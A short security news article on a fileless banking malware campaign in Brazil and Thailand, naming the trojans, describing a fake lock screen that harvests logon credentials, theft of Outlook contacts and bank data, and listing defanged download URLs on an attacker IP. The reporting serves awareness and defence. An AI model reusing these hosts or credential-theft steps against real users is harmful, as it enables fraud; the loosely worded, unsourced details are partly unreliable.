Fileless malware attacks users of financial institutions

According to the ethical hacking training from the International Institute of Cyber Security (IICS), a group of researchers has discovered a new variety of fileless malware attacking mainly clients of some Banks in countries like Brazil and Thailand, using a hacking tool and at least two tools for information theft. 

Ethical hacking training specialists mention that malware (Trojan.BAT.BANLOAD.THBAIAI) connects to hxxp://35[.]227[.]52[.]26/Mods/AL/MD[.]zipmn to download PowerShell codes. Subsequently, the malware connects to hxxp://35[.]227[.]52[.]26/Loads/20938092830482 to run the codes and contact other URL before renaming your files to look like legitimate Windows functions.

Finally, malware causes the infected computer to restart to display a fake lock screen, intended for the victim to enter their logon credentials.

As you start to remove all your loads, the malware downloads two other hacking tools. The First (TrojanSpy.Win32.BANRAP.AS) initiates the victim’s Outlook and sends the stored email addresses to their command and control server. The second tool (HKTL_RADMIN) allows a hacker to gain administrator privileges on the compromised system. 

When the user logs on again, the malware releases a file to load the third hacking tool (Trojan.JS.BANKer.THBAIAI), which takes control of the victim-visited site history by searching for bank information. When you find something of your interest, collect the information and send it to your C&C.

This campaign is one more example of the pronounced growth experienced by file-free malware attacks in recent times; According to specialists in cybersecurity, about 35% of the cyberattacks registered in 2018 used a variety of malware without files.

According to the specialists of the ethical hacking training specialists, a professional cybersecurity service can defend an organization against most of this kind of threats by periodically updating software. To complement this work, each organization’s IT teams must have an appropriate defense plan, combining automatic learning and tools such as the sandbox environment to ensure the best protection against fileless malware attacks.